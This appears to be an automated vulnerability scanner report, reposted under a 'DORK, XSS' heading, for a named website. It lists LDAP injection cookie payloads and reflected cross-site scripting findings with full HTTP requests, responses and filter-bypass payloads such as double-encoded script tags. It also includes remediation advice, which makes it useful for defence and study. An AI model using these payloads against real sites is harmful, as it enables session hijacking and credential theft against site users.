DORK, XSS, Cross Site Scripting, www.local.com

The anonId cookie appears to be vulnerable to LDAP injection attacks.

The payloads 369bbd54d1b325fa)(sn=* and 369bbd54d1b325fa)!(sn=* were each submitted in the anonId cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=369bbd54d1b325fa)(sn=*; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response 1

Request 2

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=369bbd54d1b325fa)!(sn=*; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response 2

2. Cross-site scripting (reflected) previous next
There are 27 instances of this issue:

/dart/ [cat parameter]
/dart/ [cat parameter]
/dart/ [css parameter]
/dart/ [l parameter]
/dart/ [l parameter]
/dart/ [ord parameter]
/dart/ [ord parameter]
/dart/ [p parameter]
/dart/ [p parameter]
/dart/ [pos parameter]
/dart/ [pos parameter]
/dart/ [sz parameter]
/dart/ [sz parameter]
/dart/ [t parameter]
/dart/ [t parameter]
/dart/ [zone parameter]
/dart/ [zone parameter]
/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
/results.aspx [cid parameter]
/results.aspx [cid parameter]
/results.aspx [client parameter]
/results.aspx [name of an arbitrarily supplied request parameter]
/topics/ [keyword parameter]
/ver1.0/Direct/Jsonp [cb parameter]
/ver1.0/ReviewPage.app [articleKey parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.local.com/dart/ [cat parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services629be';alert(1)//3d8ca4cb923;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

2.2. http://www.local.com/dart/ [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services14aca"><script>alert(1)</script>e268f1e14c1;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

2.3. http://www.local.com/dart/ [css parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=banner36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 890
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:29 GMT
Connection: close
Content-Length: 890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<body class="banner36ffb"style="x:expression(alert(1))"4094d82a023">
...[SNIP]...

2.4. http://www.local.com/dart/ [l parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX9cd27'%3b570d9e9b527 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx9cd27';570d9e9b527;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.5. http://www.local.com/dart/ [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TXfe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_txfe54b"><script>alert(1)</script>710dcff3a6b;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

2.6. http://www.local.com/dart/ [ord parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=129674888274880630'%3bc205c1fb2ef&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=129674888274880630';c205c1fb2ef?" type="text/javascript">
...[SNIP]...

2.7. http://www.local.com/dart/ [ord parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
